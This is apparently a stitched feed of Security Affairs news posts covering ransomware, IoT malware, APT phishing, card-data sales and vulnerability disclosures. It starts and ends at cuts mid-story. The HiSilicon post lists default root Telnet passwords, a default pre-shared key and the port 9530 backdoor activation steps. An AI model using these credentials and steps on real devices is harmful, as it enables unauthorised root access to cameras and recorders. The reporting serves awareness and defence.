During the investigation, traces were found that show that the attacker collected data regarding the topology of the network, usernames, and passwords of multiple accounts, and other network architecture information,” reads the report. “During the investigation, traces were found that show that the attacker collected data regarding the topology of the network, usernames and passwords of multiple accounts, and other network architecture information. Fox-IT did not find any traces within the scope of the investigation that point to the collection of other types of data.”

The decision was taken by the Executive Board after evaluating the consequences of a prolonged downtime on the servers at the university.

“It is a decision that was not taken lightly by the Executive Board. But it was also a decision that had to be made,” states UM. “We felt, in consultation with our management and our supervisory bodies, that we could not make any other responsible choice when considering the interests of our students and staff.”

“The fact that on 6 January and thereafter we were able to have teaching and exams take place, more or less as planned, that UM researchers suffered little or no irreparable damage, and that we were also able to make the salary payments for 4,500 employees on time, strengthens our confidence that we made the right choice.”

Pierluigi Paganini

(SecurityAffairs – Maastrict University, ransomware)

The post Maastricht University finally paid a 30 bitcoin ransom to crooks appeared first on Security Affairs.

IoT devices at major Manufacturers infected with crypto-miner

Hackers have infected with a piece of malware some IoT devices running Windows 7 designed by three of the world’s largest manufacturers.

Security experts from TrapX reported that some IoT devices running Windows 7 have been infected with a piece of malware, is it a supply chain attack?

The experts reported that several IoT devices at some major manufacturers have been infected with a cryptocurrency miner in October 2019. The list of infected devices includes automatic guided vehicles, a printer, and a smart TV.

“The malware sample intercepted and analyzed by TrapX® is part of the Lemon_Duck sample family running on a double-click action or through persistence mechanisms.” reads the report published by TrapX.”First, the malware scanned the network for potential targets, including those with SMB (445) or MSSQL (1433) services open. Once finding a potential target, the malware ran multiple threads with multiple functionalities.”

Windows 7 Iot miner manufacturer

According to the experts, the attacks could part of the same malware campaign, the infections were observed in over 50 sites of the manufacturers in the Middle East, North America, and Latin America.

Attackers employed downloader that runs malicious scripts associated with a cryptocurrency miner named Lemon_Duck. The researchers explained that the malware rapidly spread and is considered for this reason as “extremely disruptive.”

“Once again, the entry point was a device running Windows 7. The campaign caused confusion on the production line possibly damaging products AGVs assemble. The malware spread quickly enough to be extremely disruptive.” continues the report. “TrapX softwaware provided early breach detection and allowed the security team to immediately disconnect the infected AGV from the network before severe damage could occur.”

The malware infected embedded systems running Windows 7, but the popular Microsoft OS reached the end of life in January.

This incident is worrisome because there are hundreds of millions of systems worldwide that run on top of the Windows 7 operating system.

The report includes a description of the attacks detected by the experts, for example, several automatic guided vehicles (AGVs) that were running Windows 7 were found infected at one manufacturing site.

Infections of AVG systems are very dangerous and could directly threaten human safety, the researchers warn of risks associated with the disruption of communications and the generation of incorrect commands by malware.

In another case presented by TrapX, the malware was found on a DesignJet SD Pro multifunction printer that had been used to print technical engineering drawings containing sensitive data related to the target’s production process. In this case, the device was used by attackers as the entry point into the target’s network.

TrapX experts speculate the cases were the result of a supply chain attack, this means that the malware was installed on the devices before they were deployed in the manufacturers’ sites.

Additional details, including Indicators of Compromise (IoCs) are reported in the analysis published by TrapX.

Pierluigi Paganini

(SecurityAffairs – Windows 7, hacking)

The post IoT devices at major Manufacturers infected with crypto-miner appeared first on Security Affairs.

Facebook’s official Twitter and Instagram accounts hacked by OurMine

The social network giant Facebook is still the target of hackers, its Facebook and Instagram accounts have been hijacked by the popular hacking group OurMine

Yesterdat the popular hacking group OurMine hacked the Twitter and Instagram accounts for Facebook and Messenger.

The company accounts have been quickly restored.

The notorious Saudi Arabian OurMine hacking group has hacked accounts and systems of prominent experts and organizations across the years, including Facebook CEO Mark Zuckerberg’s Pinterest, Twitter, LinkedIn accounts.

The group claims its intent is to demonstrate that every system or individual could be hacked, in January it hijacked over a dozen accounts for teams in the US National Football League (NFL).

The group disappeared for a long perioud, last clamourous hack was the breach of the popular video streaming service Vevo in 2017.

OurMine also hacked social media accounts of HBO and Game of Thrones, the Netflix US Twitter account (@Netflix) to promote its website and hacking services, and several high-profile Twitter accounts. The list of victims is very long and includes Mark ZuckerbergTwitter co-founder Evan Williams, David Guetta Daniel Ek, former Twitter CEO Dick Costolo, Twitter CEO Jack Dorsey, the CEO and founder of Spotify, Google CEO Sundar Pichai, and many others.

Yesterday the group hacked the accounts of the social network giant and posted the following statement:

“Hi, we are OurMine. Well, even Facebook is hackable but at least their security is better then Twitter.”

Facebook hacked ourmine

OurMine also hacked Facebook and Messenger accounts on Instagram and posted a photo of the group’s logo.

According to FB, the attack involved a third-party and that accounts were locked once the attack was discovered.

“As soon as we were made aware of the issue, we locked the compromised accounts and are working closely with our partners at Facebook to restore them,” said a Twitter spokesperson.

Facebook also confirmed the hack of its official social media accounts.

“Some of our corporate social accounts were briefly hacked but we have secured and restored access,” Facebook spokesman Joe Osborne said.

https://twitter.com/Facebook/status/1225959837709697025

The hack of Facebook’ accounts has similarities with the attack on NFL teams’ accounts. Experts speculate the accounts have been accessed via the third-party marketing platform Khoros that allows businesses to manage social media communications.

Pierluigi Paganini

(SecurityAffairs – OurMine, hacking)

The post Facebook’s official Twitter and Instagram accounts hacked by OurMine appeared first on Security Affairs.

Group-IB detects Half a Million Indian Banks’ Cards on Joker’s Stash Cardshop

Group-IB experts detected a database containing over 460,000 payment card records uploaded to Joker’s Stash cardshops, most of records were from the Indian banks.

Group-IB, a Singapore-based cybersecurity company that specializes in preventing cyberattacks, has detected a database containing over 460,000 payment card records uploaded to one of the most popular darknet cardshops (Joker’s Stash) on February 5. Over 98 percent of the records were from the biggest Indian banks.

The underground market value of the database is estimated at more than USD 4.2 million. The source of this batch currently remains unknown. Upon the discovery of this database, Group-IB has immediately informed the Indian Computer Emergency Response Team (CERT-In) about the sale of the payment records, so they could take necessary steps.

This is the second major upload of payment records related to Indian cardholders registered by Group-IB in the past several months. The first one was reported by Group-IB last October.

On February 5, a new database under the name “INDIA-BIG-MIX” (full name: [CC] INDIA-BIG-MIX (FRESH SNIFFED CVV) INDIA/EU/WORLD MIX, HIGH VALID 80-85%, uploaded 2020-02-05 (NON-REFUNDABLE BASE) went on sale on the Joker’s Stash — one of the most popular underground cardshops.

Fig. 1″INDIA-BIG-MIX” database put up for sale on Joker’s Stash

According to Group-IB Threat Intelligence team, the database, comprising 461,976 payment records, in particular, exposed card numbers, expiration dates, CVV/CVC codes and, in this case, some additional information such as cardholders’ full name, as well as their emails, phone numbers and addresses. 

Fig. 2 Types of information contained in the database published on Joker’s Stash

All the cards from the database are being sold for $9 for piece, with the total underground market value of all the batch standing at $4,157,784. As of morning on February 6, 16 cards were sold out.

According to Group-IB Threat Intelligence team, this is the only big sale of Indian cards’ CC data detected for the past 12 months, since in the previous India case, card dumps — the information contained in the card magnetic stripe — were put up for sale. What distinguishes the new database from its predecessor is the fact that the cards were likely compromised online, this assumption is supported by the set of data offered for sale.

Fig. 3 Graph of sale of Indian bank cards CC data on underground cardshops

“This is the second major leak of cards relating to Indian banks detected by Group-IB Threat Intelligence team in the past several months,” comments Dmitry Shestakov, the head of Group-IB сybercrime research unit. “In the current case, we are dealing with so-called fullz — they have info on card number, expiration date, CVV/CVC, cardholder name as well as some extra personal info. Such type of data is likely to have been compromised online — with the use of phishing, malware, or JS-sniffers — while in the previous case, we dealt with card dumps (the information contained in the card magnetic stripe), which can be stolen through the compromise of offline POS terminals, for example. We have shared all the information discovered with our colleagues from CERT-In.”

On October 28, 2019, Group-IB Threat Intelligence team detected a huge database holding more than 1.3 million credit and debit card records of mostly Indian banks’ customers uploaded to Joker’s Stash. Group-IB experts determined that the underground market value of the database was estimated at more than $130 million. This became the biggest card database encapsulated in a single file ever uploaded on underground markets at once.

According to Group-IB’s “Hi-Tech Crime Trends 2019/2020” report, presented at CyberCrimeCon’19 in Singapore last November, the size of the carding market rose by 33 percent and totaled USD 879.7 million in H2 2018 — H1 2019 year-on-year. The sale of CC data is also on rise today, having grown by 19 percent in the corresponding period.

One of the reasons behind the carding market boosting were the activities of JS-sniffers, which enable their operators to steal payment card data from ecommerce websites. This threat can hardly be underestimated: the APAC region has recently seen its first arrest of JS-sniffers’ operators, who stole payment card data with the help of GetBilling JS-sniffer family. The arrest came as a result of a joint operation of Group-IB with INTERPOL and Indonesian police.

About the author: Group-IB

Group-IB is a Singapore-based provider of solutions aimed at detection and prevention of cyberattacks, online fraud, IP protection and high-profile cyber investigations. Group-IB’s experience, threat hunting & intelligence have been fused into an ecosystem of highly sophisticated software and hardware solutions designed to monitor, identify, and prevent cyber threats.

Pierluigi Paganini

(SecurityAffairs – Joker’s Stash, hacking)

The post Group-IB detects Half a Million Indian Banks’ Cards on Joker’s Stash Cardshop appeared first on Security Affairs.

RobbinHood ransomware exploit GIGABYTE driver flaw to kill security software

The operators behind the infamous RobbinHood ransomware are exploiting a vulnerable GIGABYTE driver to kill antivirus products.

Cybercriminals behind the RobbinHood Ransomware are exploiting a vulnerable GIGABYTE driver to install a malicious and unsigned driver into Windows with the intent of disabling security products.

Ransomware operators leverage a custom antivirus killing package that is delivered to workstations to disable security solution before starting encryption.

Normally, Windows security software processes could only be killed by Kernel drivers. In order to prevent the abuse of kernel drivers, Microsoft also implements a driver signature verification mechanism, this means that only kernel drivers co-signed by Microsoft could be installed.

Now security researchers from Sophos have detailed a new novel technique implemented by threat actors in attacks ([12]) involving two pieces of RobbinHood ransomware.

robbinhood ransomware

Attackers installed a known vulnerable GIGABYTE driver that has been cosigned by Microsoft and exploited a known vulnerability to disable Microsoft’s driver signature enforcement feature.

“Sophos has been investigating two different ransomware attacks where the adversaries deployed a legitimate, digitally signed hardware driver in order to delete security products from the targeted computers just prior to performing the destructive file encryption portion of the attack.” reads the report published by Sophos. “The signed driver, part of a now-deprecated software package published by Taiwan-based motherboard manufacturer Gigabyte, has a known vulnerability, tracked as CVE-2018-19320.”

The technique used by the operators consists in:

  1. Attackers get a foothold on the target’s network and install legitimate Gigabyte kernel driver GDRV.SYS.
  2. Attackers exploit the CVE-2018-19320 vulnerability in the legitimate driver to gain kernel access.
  3. Attackers use the kernel access to temporarily disable the Windows OS driver signature enforcement and install a malicious kernel driver named RBNL.SYS.
  4. Attackers use this driver to disable security products.
  5. Attackers execute the RobbinHood ransomware and attempt to encrypt the files on the infected host.

“In this attack scenario, the criminals have used the Gigabyte driver as a wedge so they could load a second, unsigned driver into Windows,” continues the Sophos’ report. “This second driver then goes to great lengths to kill processes and files belonging to endpoint security products, bypassing tamper protection, to enable the ransomware to attack without interference.”

In the attacks observed by Sophos, the operators deployed an executable named Steel.exe that exploit the CORE-2018-0007 vulnerability in the GIGABYTE gdrv.sys driver.

Experts pointed out that the Steel.exe program terminates processes whose files are included in a file called PLIST.TXT, unfortunately Sophos had mo access to the file and it is not able to determine what security solutions are being targeted.

Once the Steel.exe has terminated security software, the RobbinHood ransomware will encrypt files on the infected systems.

Technical details about the attacks are reported in the report published by Sophos, including Indicators of Compromise (IoCs).

Pierluigi Paganini

(SecurityAffairs – RobbinHood ransomware, hacking)

The post RobbinHood ransomware exploit GIGABYTE driver flaw to kill security software appeared first on Security Affairs.

Japanese defense contractors Pasco and Kobe Steel disclose security breaches

Japanese defense contractors Pasco and Kobe Steel have disclosed security breaches that they have suffered back in 2016 and 2018.

Pasco is Japan’s largest geospatial provider and Kobe Steel is one of the major steel manufacturers. Just last week, Japan’s Ministry of Defense announced in addition to Mitsubishi Electric and the NEC defense business division other two unnamed contractors suffered a data breach.

The Japanese Defense Minister Taro Kono said during a press conference on January 31 that four defense suppliers were hacked between 2016 and 2019,

After the announcement, both Pasco and Kobe Steel disclose the incidents, while Pasco declared that it had not found any evidence that personal or business information had been stolen by attackers, Kobe confirmed that some files may have been exfiltrated.

Kobe identified unauthorized access to its network in August 2016 and in June 2017, Pasco had detected the intrusion in May 2018.

However, contrary to what Kobel declared in the official statement, the Nikkei website reports that hackers have accessed to 250 files containing data related to the Ministry of Defense and personal info.

The Japanese Defense Minister Taro Kono added that there is no evidence that the attacks are related to each other.

In January, Mitsubishi Electric disclosed a security breach that might have exposed personal and confidential corporate data. According to the company, attackers did not obtain sensitive information about defense contracts.

The breach was detected almost eight months ago, on June 28, 2019, with the delay being attributed to the increased complexity of the investigation caused by the attackers deleting activity logs.

Two Japanese media outlets attributed the cyber attack to a China-linked cyber espionage group tracked as Tick (aka Bronze Butler).

The hacker group has been targeting Japanese heavy industry, manufacturing and international relations at least since 2012,

According to the experts, the group is linked to the People’s Republic of China and is focused on exfiltrating confidential data. The attackers have exploited a directory traversal and arbitrary file upload vulnerability, tracked as CVE-2019-18187, in the Trend Micro OfficeScan antivirus.

“According to people involved, Chinese hackers Tick may have been involved. According to Mitsubishi Electric, “logs (to check for leaks) have been deleted and it is not possible to confirm whether or not they actually leaked.” reported the Nikkei.

“According to the company, at least tens of PCs and servers in Japan and overseas have been found to have been compromised. The amount of unauthorized access is approximately 200 megabytes, mainly for documents.”

A few days later, the IT giant NEC confirmed that the company defense business division has suffered a security breach back in December 2016.

The Japanese firm confirmed the unauthorized access to its internal network after Japanese newspapers disclosed the security incident citing sources informed of the event.

NEC is a contractor for Japan’s defense industry and was involved in various defense projects.

Roughly 28,000 files were found by the company on one of the compromised servers, some of them containing info about defense equipment.

Experts believe that the attacks on Japanese Defense’s contractors were part of a cyber espionage campaign carried out by Chinese hackers.

Pierluigi Paganini

(SecurityAffairs – Pasco and Kobe Steel, hacking)

The post Japanese defense contractors Pasco and Kobe Steel disclose security breaches appeared first on Security Affairs.

Iran-linked APT group Charming Kitten targets journalists, political and human rights activists

Iran-linked APT group Charming Kitten has been targeting journalists, political and human rights activists in a new campaign.

Researchers from Certfa Lab reports have spotted a new cyber espionage campaign carried out by Iran-linked APT group Charming Kitten that has been targeting journalists, political and human rights activists.

Iran-linked Charming Kitten group, (aka APT35PhosphorusNewscaster, and Ajax Security Team) made the headlines in 2014 when experts at iSight issued a report describing the most elaborate net-based spying campaign organized by Iranian hackers using social media.

Microsoft has been tracking the threat actors at least since 2013, but experts believe that the cyberespionage group has been active since at least 2011 targeting journalists and activists in the Middle East, as well as organizations in the United States, and entities in the U.K., Israel, Iraq, and Saudi Arabia.

The campaign uncovered by Certfa Lab is related to previously observed targeted attacks against a U.S. candidate, government officials, and expatriate Iranians.

Certfa Lab has identified a new series of phishing attacks from the Charming Kitten1, the Iranian hacking group who has a close relationship with Iran’s state and Intelligence services. According to our investigation, these new attacks have targeted journalists, political and human rights activists.” reads the post published by Certfa Lab. “These phishing attacks are in line with the previous activities of the group that companies like ClearSky2 and Microsoft3 have reported in detail in September and October 2019.”

The Iranian hackers are still focusing to target private and government institutions, think tanks and academic institutions, organizations with ties to the Baha’i community, and many others in European countries, the United States, United Kingdom, and Saudi Arabia.

The attackers created a fake account impersonating New York Times journalist Farnaz Fassihi (former Wall Street Journal (WSJ) journalist) to send fake interview proposals or invitations to a webinar to the target individuals and trick them into accessing phishing websites. 

The spear-phishing messages use links in the footnotes, including social media links, WSJ and Dow Jones websites, that are all in the short URL format. When the victims click on them, they are redirected to legitimate addresses while getting basic information about the victim’s device (i.e. IP address, Operating System, and browser) that could be used to prepare the attack against the victim’s devices.

Then, the attackers send a link to a page containing interview questions that is hosted on Google Sites, a common trick to evade detection.

Once the victims clicked the download button on the Google Site page, they will be redirected to another fake page in two-step-checkup[.]site domain where login credential details of his/her email such as the password and two factor authentication (2FA) code are requested.

Charming Kitten phishing 2.png

Attackers employed a backdoor named “pdfreader.exe,” it was first uploaded to VirusTotal by an anonymous user on 3 October 2019. The malware gathers victim device data and achieves persistence through modified Windows Firewall and Registry settings. Experts pointed out that the malware is linked to operators behind past Charming Kitten campaigns

“The similarities between the method of managing and sending HTTP requests in “two-step-checkup[.]site” server with the latest techniques used by this group is further evidence of Charming Kitten’s connection to these attacks.” continues the report.”In this technique, if sent requests to the host server of the phishing kit are denied, the user is directed to a legitimate website like Google, Yahoo!, or Outlook by “301 Moved Permanently” and “Found redirect 302” responses. As a result, this method makes it harder for different pages and sections of phishing websites to be exposed to the public.”

The recently discovered phishing attacks by the Charming Kitten are in line with previous activities conducted by the group. Certfa speculates that the APT group is working on the development of a series of malware for their future phishing attack campaign.

“The Charming Kitten used Google Sites for their phishing attack, and Certfa believes that they work on the development of a series of malware for their future phishing attack campaign.” concludes the report.

Pierluigi Paganini

(SecurityAffairs – Charming Kitten, APT)

The post Iran-linked APT group Charming Kitten targets journalists, political and human rights activists appeared first on Security Affairs.

Critical Android Bluetooth flaw CVE-2020-0022 could be exploited without user interaction

Google addressed a critical vulnerability in its Android OS that affects the Bluetooth subsystem and could be exploited without user interaction.

Google has addressed a critical flaw in Android OS that affects the Bluetooth subsystem and could be exploited without user interaction.

The vulnerability tracked as CVE-2020-0022 is a remote code execution flaw that could allow attackers to execute code on the device with the elevated privileges of the Bluetooth daemon when the wireless module is active. The critical vulnerability impact Android Oreo (8.0 and 8.1) and Pie (9), while it is not exploitable on Android 10 for technical reasons and only trigger a DoS condition of the Bluetooth daemon.

“The most severe vulnerability in this section could enable a remote attacker using a specially crafted transmission to execute arbitrary code within the context of a privileged process.” reads the security bulletin published by Android.

The flaw was reported to Google by Jan Ruge from the Technische Universität Darmstadt, Secure Mobile Networking Lab.

The risk of exploitation of such kind of vulnerabilities is that they could be used to implement a ‘wormable‘ behavior in mobile malware that could rapidly spread from one infected device to another device that is in its proximity and reachable via Bluetooth.

The issue could be exploited only if the attacker knows the Bluetooth MAC address of the target, but this is quite easy to retrieve.

“On Android 8.0 to 9.0, a remote attacker within proximity can silently execute arbitrary code with the privileges of the Bluetooth daemon as long as Bluetooth is enabled.” the researcher wrote on a blog post on the site of IT security consultant ERNW. “No user interaction is required and only the Bluetooth MAC address of the target devices has to be known. For some devices, the Bluetooth MAC address can be deduced from the WiFi MAC address. This vulnerability can lead to theft of personal data and could potentially be used to spread malware (Short-Distance Worm).”

To mitigate the flaw, Ruge recommends disabling Bluetooth and enable it only “if strictly necessary.” If you need to activate Bluetooth, it is recommended to set the device non-discoverable for pairing with other devices.

Android users should apply the latest security patches as soon as possible.

Pierluigi Paganini

(SecurityAffairs – Android, hacking)


The post Critical Android Bluetooth flaw CVE-2020-0022 could be exploited without user interaction appeared first on Security Affairs.

cdpwn – Millions of devices at risk due to flaws in implementations of Cisco Discovery Protocol (CDP)

A set of vulnerabilities in the Cisco Discovery Protocol (CDP) exposes tens of millions of devices to the risk of cyber attacks.

Researchers at IoT security firm Armis discovered a set of five serious vulnerabilities in the implementation of the Cisco Discovery Protocol (CDP) protocol. The experts tracked the set as CDPwn and warned that the issues could be exploited by attackers to take complete control of vulnerable devices.

Armis has discovered five critical, zero-day vulnerabilities in various implementations of the Cisco Discovery Protocol (CDP) that can allow remote attackers to completely take over devices  without any user interaction. CDP is a Cisco proprietary Layer 2 (Data Link Layer) network protocol that is used to discover information about locally attached Cisco equipment.” reads the advisory published by Armis. “CDP is implemented in virtually all Cisco products including switches, routers, IP phones and cameras. All those devices ship from the factory with CDP enabled by default. The CERT Coordination Center has also issued an advisory.”

Cisco Discovery Protocol (CDP) is a proprietary Data Link Layer protocol developed by Cisco Systems in 1994 that is used to share information about other directly connected Cisco equipment, including the operating system version and IP address.

The protocol is used by Cisco network equipment (switches, routers), IP phones, and cameras.

Four vulnerabilities of the CDPwn set are remote code execution (RCE) vulnerabilities, the other one is a Denial of Service (DoS) flaw. An attacker could exploit the flaws only once it has gained access to the target network, then he would send specially crafted CDP packets to the targeted device.

An attacker could exploit the RCE vulnerabilities to break the network segmentation, to exfiltrate corporate network traffic traversing through an organization’s switches and routers, to gain access to additional devices by leveraging man-in-the-middle attacks by intercepting and altering traffic on the corporate switch, to exfiltrate sensitive information such as phone calls from devices like IP phones and video feeds from IP cameras

The code execution vulnerabilities affect the NX-OS, IOS XR, IP phone, and IP camera implementations, while the DoS flaw impact the FXOS, IOS XR and NX-OS implementations of CDP.

Armis researchers presented several attack scenarios, such as breaking of network segmentation, data exfiltration from devices like IP phones and cameras

cdp cdpwn flaws

Cisco has published security dvisories and released patches to address the issues. The flaws were tracked as CVE-2020-3120, CVE-2020-3119, CVE-2020-3118, CVE-2020-3111 and CVE-2020-3110 an received a high severity rating.

Pierluigi Paganini

(SecurityAffairs – cdpwn cdp flaws, hacking)

The post cdpwn – Millions of devices at risk due to flaws in implementations of Cisco Discovery Protocol (CDP) appeared first on Security Affairs.

Hacking Wi-Fi networks by exploiting a flaw in Philips Smart Light Bulbs

Check Point experts discovered a high-severity flaw in Philips Hue Smart Light Bulbs that can be exploited to gain entry into a targeted WiFi network.

Security experts from Check Point discovered a high-severity flaw (CVE-2020-6007) in Philips Hue Smart Light Bulbs that can be exploited by hackers to gain entry into a targeted WiFi network.

Lightbulbs could be remotely controlled through a mobile app or via a digital home assistant, owners could control the light in the environment and even calibrate the color of each lightbulb. Smart lightbulbs are managed over the air via WiFi protocol or ZigBee, a low bandwidth radio protocol.

Check Point experts demonstrated that it is possible to trigger the issue into Philips Hue Smart Light Bulbs over-the-air from over 100 meters away.

The CVE-2020-6007 flaw ties the way Philips implemented the Zigbee communication protocol in its smart light bulb, it could lead to a heap-based buffer overflow issue.

ZigBee is an IEEE 802.15.4-based specification for a suite of high-level communication protocols used to create personal area networks with small, low-power digital radios, such as for home automation, medical device data collection, and other low-power low-bandwidth needs, designed for small scale projects which need wireless connection.

The buffer overflow occurs in the “bridge” component that accepts remote commands sent to the bulb over Zigbee protocol from other devices such as a mobile app.

“Check Point’s researchers showed how a threat actor could exploit an IoT network (smart lightbulbs and their control bridge) to launch attacks on conventional computer networks in homes, businesses or even smart cities.” reads the report published by CheckPoint.”Our researchers focused on the market-leading Philips Hue smart bulbs and bridge, and found vulnerabilities (CVE-2020-6007) that enabled them to infiltrate networks using a remote exploit in the ZigBee low-power wireless protocol that is used to control a wide range of IoT devices.”

Researchers did not reveal technical details or PoC exploit for the vulnerability to allow users to patch their systems.

The researchers published is a video that shows how they have exploited the vulnerabilities in the Philips Hue bridge to compromise a target computer network and to attack the computer itself using the EternalBlue exploit.

Below the attack chain that was visible in the video PoC:

  1. The attacker takes control over the smart bulb by exploiting a vulnerability in smart light bulbs in 2017.
  2. The device is not more ‘reachable’ in the users’ control app, tricking users into resetting the bulb and then instructing the control bridge to re-discover the bulb.
  3. The bridge discovers the hacker-controlled bulb with updated firmware, and the user adds it back onto their network.
  4. The attacker exploits vulnerabilities in the ZigBee protocol to trigger a heap-based buffer overflow on the control bridge and install a malicious code on the bridge that’s connected to the targeted network.
  5. The malware could move laterally and infect other systems in the target network.

“Many of us are aware that IoT devices can pose a security risk, but this research shows how even the most mundane, seemingly ‘dumb’ devices such as lightbulbs can be exploited by hackers and used to take over networks, or plant malware.” explianed Yaniv Balmas, head of cyber research at Check Point. “It’s critical that organizations and individuals protect themselves against these possible attacks by updating their devices with the latest patches and separating them from other machines on their networks, to limit the possible spread of malware. In today’s complex fifth-generation attack landscape, we cannot afford to overlook the security of anything that is connected to our networks.”

Check Point reported the issue to Philips and Signify (owner of the Philips Hue brand) in November 2019. The company released firmware patches for the device in January.

Pierluigi Paganini

(SecurityAffairs – Smart Light Bulbs, hacking)

The post Hacking Wi-Fi networks by exploiting a flaw in Philips Smart Light Bulbs appeared first on Security Affairs.

Microsoft detects 77,000 active web shells on a daily basis

Microsoft published an interesting report that investigates web shell attacks, the IT giant says it detects 77,000 active web shells daily.

According to a report published by Microsoft, the company detects an average of 77,000 active web shells, spreading across 46,000 infected servers, on a daily base.

A web shell is a code, often written in typical web development programming languages (e.g., ASP, PHP, JSP), that attackers implant on web servers to gain remote access and code execution.

Microsoft observed several threat groups, including ZINCKRYPTON, and GALLIUM, using these malicious codes in their campaigns. Threat actors use to exploit known issues in web applications to compromise web server and install the web shells. One of the most widely adopted web shells is the China Chopper one that was employed in numerous cyberespionage campaigns carried out by China-linked APT groups.

In October 2018, security agencies belonging to Five Eyes (United States, United Kingdom, Canada, Australia and New Zealand) have released a joint report that details some popular hacking tools, including China Chopper.

77,000 detections on a daily base are worrisome figure and could give us an indication of the intense activity of threat actors in cyberspace.

“Unfortunately, these gaps appear to be widespread, given that every month, Microsoft Defender Advanced Threat Protection (ATP) detects an average of 77,000 web shell and related artifacts on an average of 46,000 distinct machines.” reads the report published by Microsoft.

web shells Microsoft encounters

“Because web shells are a multi-faceted threat, enterprises should build comprehensive defenses for multiple attack surfaces.” concludes Microsoft. ” Gaining visibility into internet-facing servers is key to detecting and addressing the threat of web shells. The installation of web shells can be detected by monitoring web application directories for web script file writes. Applications such as Outlook Web Access (OWA) rarely change after they have been installed and script writes to these application directories should be treated as suspicious. “

Pierluigi Paganini

(SecurityAffairs – cybersecurity, hacking)

The post Microsoft detects 77,000 active web shells on a daily basis appeared first on Security Affairs.

Expert released PoC exploit code for unpatched backdoor in HiSilicon chips

Researcher published details about a backdoor mechanism he found in HiSilicon chips, but he did not report it to the vendor due to the lack of trust in it.

The Russian security expert Vladislav Yarmak has published technical details about a backdoor mechanism he discovered in HiSilicon chips.

The backdoor mechanism could allow attackers to gain root shell access and full control of device. The expert also published a Proof of concept code for the vulnerability.

The expert did not disclose the flaw to HiSilicon due to the lack of trust in the vendor to address the issue.

HiSilicon is a Chinese fabless semiconductor company based in Shenzhen and owned by Huawei, it is the largest domestic designer of integrated circuits in China.

HiSilicon is the largest domestic designer of integrated circuits in China, its chips are used by millions of IoT devices worldwide, including security cameras, DVRs, and NVRs.

HiSilicon chips

The presence of backdoor mechanisms in the HiSilicon chips was already documented by other experts in the past.

More recent versions of the devices had access enabled with a static root can be recovered from with (relatively) little computation effort.

More recent firmware versions had Telnet access and debug port (9527/tcp) disabled by default, but they had open port 9530/tcp that could be exploited by attackers to send a special command to start telnet daemon and enable shell access with a static password ([1], [2], [3]).

“Most recent firmware versions have open port 9530/tcp listening for special commands, but require cryptographic challenge-response authentication for them to be committed. This is a subject of actual disclosure.” reads the post publishe by Yarmak.

“Apparently, all these years HiSilicon was unwilling or incapable to provide adequate security fixes for same backdoor which, by the way, was implemented intentionally.”

Yarmak explained that it is possible to exploit the backdoor by sending a series of commands over TCP port 9530 to devices based on HiSilicon chips. The commands allow the attacker to enable the Telnet service on a flawed device, then the attacker could log in using one of the following six Telnet credentials, and gain access to a root account.

LoginPassword
rootxmhdipc
rootklv123
rootxc3511
root123456
rootjvbzd
root hi3518

Below the backdoor activation process described by the expert:

  1. Client opens connection to port TCP port 9530 of device and sends string OpenTelnet:OpenOnce prepended with byte indicating total message length. This step is last for previous versions of backdoor. Probably telnetd was already started if there no response after this step.
  2. Server (device) anwers with string randNum:XXXXXXXX where XXXXXXXX is 8-digit random decimal number.
  3. Client uses it’s pre-shared key and constructs encryption key as concatenation of received random number and PSK.
  4. Client encrypts random number with encryption key and sends it after string randNum:. Entire message is prepended with byte indicating total length of message.
  5. Server loads same pre-shared key from file /mnt/custom/TelnetOEMPasswd or uses default key 2wj9fsa2 if file is missing.
  6. Server performs encryption of random number and verifies result is identical with string from client. On success server sends string verify:OK or verify:ERROR otherwise.
  7. Client encrypts string Telnet:OpenOnce, prepends it with total length byte, CMD: string and sends to server.
  8. Server extracts and decryptes received command. If decryption result is equal to string Telnet:OpenOnce it responds with Open:OK, enables debug port 9527 and starts telnet daemon.

Yarmak pointed out that despite the presence of backdoor mechanism was reported by experts in the past, the vendor was not able to address them and only opted to disable the Telnet service.

The bad news for the users is that currently even if no patch is available for the backdoor, the expert decided to publish a proof-of-concept (PoC) code.

“Taking into account earlier bogus fixes for that vulnerability (backdoor, actually) it is not practical to expect security fixes for firmware from [the] vendor,” Yarmak concludes. “Owners of such devices should consider switching to alternatives.”

As mitigation, users are recommended to “completely restrict network access to these devices to trusted users.”

According to the expert, there are dozens of brands and hundreds of model vulnerable to hack, he referred to previous research conducted by another researcher that listed some of the vulnerable brands.

Pierluigi Paganini

(SecurityAffairs – HiSilicon chips, hacking)

The post Expert released PoC exploit code for unpatched backdoor in HiSilicon chips appeared first on Security Affairs.

Dropbox paid more than $1 Million via its bug bounty program

File hosting service company Dropbox paid out $1 million for vulnerabilities reported by researchers through its bug bounty program.

Since the launch of its bug bounty program in 2014, the file-hosting company Dropbox has paid out $1 million to date for vulnerabilities reported by researchers.

“Our bug bounty program recently passed a significant milestone. Since launching our program in 2014 and tripling our bounties in 2017, we’ve given more than $1,000,000 to bug bounty participants for valid findings submitted to our program.” reads the post published by DropBox. “Not only has Dropbox benefitted from our bug bounty program, but so have some of our most critical vendors who have remained active participants in our program.”

Currently, the bug bounty program covers the company’s websites, the Paper collaborative workspace service, and both desktop and mobile applications.

The researchers that report vulnerabilities in DropBox software could earn up to over $32,000 for critical remote code execution flaws in company servers.

DropBox paid over $318,000 via the HackerOne platform for nearly 300 vulnerabilities and $336,479 at a live hacking event held in Singapore in 2019.

“Dropbox and HackerOne invited 45 hackers from 11 countries including Singapore, the United States, Sweden, Canada, India, the Netherlands, Japan, Australia, Belgium, Hong Kong, The United Kingdom, and Portugal. They gathered to hack new scope and Dropbox core assets at Huone Event Center in the Clarke Quay area of Singapore.” reads the website of event. “In the days leading up to the event and over the course of 8 hacking hours at h1-65, 39 hackers reported 264 vulnerabilities across all applications and vendors in scope. In return, Dropbox paid $336,479 in bounties to hackers for their contributions to better security.”

The company highlights the importance of a bug bounty program for the security of its users and organizations that use the popular service.

“To those outside of the security community, it may seem counterintuitive that you can make your platform safer by encouraging security researchers to attack you, but that’s exactly the value that these programs deliver,” concluded Dropbox, “This process of discovering and remediating bugs is key to our maintaining a highly secure organization and increasingly hardened product surfaces.”

Pierluigi Paganini

(SecurityAffairs – bug bounty, hacking)

The post Dropbox paid more than $1 Million via its bug bounty program appeared first on Security Affairs.

Hackers abuse BitBucket to infect 500K+ hosts with arsenal of malware

Threat actors are abusing the Bitbucket code hosting service to host seven types of malware that has already claimed more than 500,000 business computers.

Cybereason researchers reported that attackers are abusing the Bitbucket code hosting service to store seven types of malware that were employed in an ongoing campaign. According to the experts, the malware already claimed more than 500,000 business computers worldwide.

